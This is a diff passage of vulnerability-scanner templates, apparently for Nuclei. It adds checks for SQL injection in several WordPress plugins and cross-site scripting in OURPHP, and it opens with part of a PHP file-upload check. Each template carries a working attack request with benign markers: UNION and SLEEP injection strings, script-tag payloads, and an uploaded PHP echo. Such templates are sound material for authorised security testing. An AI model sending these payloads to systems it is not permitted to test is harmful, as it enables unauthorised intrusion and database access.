<?php
echo md5("CVE-2022-46020");
?>
-----------------------------213974337328367932543216511988
Content-Disposition: form-data; name="mtime[]"
test
-----------------------------213974337328367932543216511988--
- |
GET /media/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body_6
words:
- "751a8ba516522786d551075a092a7a84"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
extractors:
- type: regex
name: username_fieldname
part: body
group: 1
regex:
- 'name="username_fieldname" value="(.*)"'
internal: true
- type: regex
name: password_fieldname
part: body
group: 1
regex:
- 'name="password_fieldname" value="(.*)"'
internal: true
- type: regex
name: formtoken
part: body
group: 1
regex:
- 'name="formtoken" value="(.*)"'
internal: true
- type: regex
name: app_name
part: body
group: 1
regex:
- 'name="app_name" value="(.*)"'
internal: true

47
http/cves/2023/CVE-2023-1020.yaml Normal file
View File

@ -0,0 +1,47 @@
id: CVE-2023-1020
info:
name: Steveas WP Live Chat Shoutbox <= 1.4.2 - SQL Injection
author: theamanrawat
severity: critical
description: |
The Steveas WP Live Chat Shoutbox WordPress plugin through 1.4.2 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.
reference:
- https://wpscan.com/vulnerability/4e5aa9a3-65a0-47d6-bc26-a2fb6cb073ff
- https://wordpress.org/plugins/wp-shoutbox-live-chat/
- https://nvd.nist.gov/vuln/detail/CVE-2023-1020
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-1020
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2023,sqli,wordpress,wp-plugin,wp,wp-shoutbox-live-chat
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
action=shoutbox-ajax-update-messages&last_timestamp=0)+UNION+ALL+SELECT+NULL,NULL,(SELECT+CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL--+&rooms%5B%5D=default
matchers-condition: and
matchers:
- type: word
part: body
words:
- "c8c605999f3d8352d7bb792cf3fdb25b"
- "no_participation"
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200

39
http/cves/2023/CVE-2023-30210.yaml Normal file
View File

@ -0,0 +1,39 @@
id: CVE-2023-30210
info:
name: OURPHP <= 7.2.0 - Cross Site Scripting
author: theamanrawat
severity: medium
description: |
OURPHP <= 7.2.0 is vulnerable to Cross Site Scripting (XSS) via /client/manage/ourphp_tz.php.
reference:
- https://www.ourphp.net/
- https://wanheiqiyihu.top/2023/03/27/OURPHP-v7-2-0-ourphp-tz-php-Reflection-xss/
- https://nvd.nist.gov/vuln/detail/CVE-2023-30210
metadata:
verified: "true"
tags: cve,cve2023,xss,ourphp,unauthenticated
http:
- method: GET
path:
- "{{BaseURL}}/client/manage/ourphp_tz.php?act=rt&callback=<script>alert(document.domain)</script>"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.domain)</script>"
- "barmemCachedPercent"
- "swapPercent"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

38
http/cves/2023/CVE-2023-30212.yaml Normal file
View File

@ -0,0 +1,38 @@
id: CVE-2023-30212
info:
name: OURPHP <= 7.2.0 - Cross Site Scripting
author: theamanrawat
severity: medium
description: |
OURPHP <= 7.2.0 is vulnerale to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php.
reference:
- https://www.ourphp.net/
- https://wanheiqiyihu.top/2023/03/27/OURPHP-v7-2-0-ourphp-out-php-Reflection-xss/
- https://nvd.nist.gov/vuln/detail/CVE-2023-30212
classification:
cve-id: CVE-2023-30212
metadata:
verified: "true"
tags: cve,cve2023,xss,ourphp
http:
- method: GET
path:
- "{{BaseURL}}/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(document.domain)</script>"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "location.href='../..</script><script>alert(document.domain)</script>'"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

34
http/vulnerabilities/wordpress/advanced-booking-calendar-sqli.yaml Normal file
View File

@ -0,0 +1,34 @@
id: advanced-booking-calendar-sqli
info:
name: Advanced Booking Calendar < 1.6.2 - SQL Injection
author: theamanrawat
severity: critical
description: |
The AJAX action abc_booking_getBookingResult, available to both authenticated and Unauthenticated users did not sanitise the calendarId parameter which was then concatenated to a SQL statement, leading an unauthenticated SQL injection issue. This could be used to retrieve information from the database, such as users' hashed password, username and email address.
remediation: Fixed in version 1.6.2
reference:
- https://wpscan.com/vulnerability/bac7b590-70de-45b3-bdc2-19f90524ca39
- https://wordpress.org/plugins/advanced-booking-calendar/
metadata:
verified: "true"
tags: sqli,wpscan,wordpress,wp-plugin,wp,advanced-booking-calendar,unauthenticated
http:
- raw:
- |
@timeout: 10s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
calendarId=1)+AND+(SELECT+2065+FROM+(SELECT(SLEEP(6)))jtGw)+AND+(5440=5440&from=2010-05-05&to=2010-05-09&action=abc_booking_getBookingResult
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "abc-result-header")'
condition: and

28
http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml Normal file
View File

@ -0,0 +1,28 @@
id: wp-autosuggest-sql-injection
info:
name: WP AutoSuggest 0.24 - SQL Injection
author: theamanrawat
severity: critical
description: |
The wp-autosuggest WordPress plugin was affected by an Unauthenticated SQL Injection security vulnerability.
reference:
- https://wpscan.com/vulnerability/9188
- https://wordpress.org/plugins/wp-autosuggest/
metadata:
verified: "true"
tags: sqli,wordpress,wp-plugin,wp,wp-autosuggest
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wp-autosuggest/autosuggest.php?wpas_action=query&wpas_keys=1%27%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F5202%2F%2A%2A%2FFROM%2F%2A%2A%2F%28SELECT%28SLEEP%286%29%29%29yRVR%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28%27dwQZ%27%2F%2A%2A%2FLIKE%2F%2A%2A%2F%27dwQZ"
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/xml")'
- 'contains(body, "<results>")'
condition: and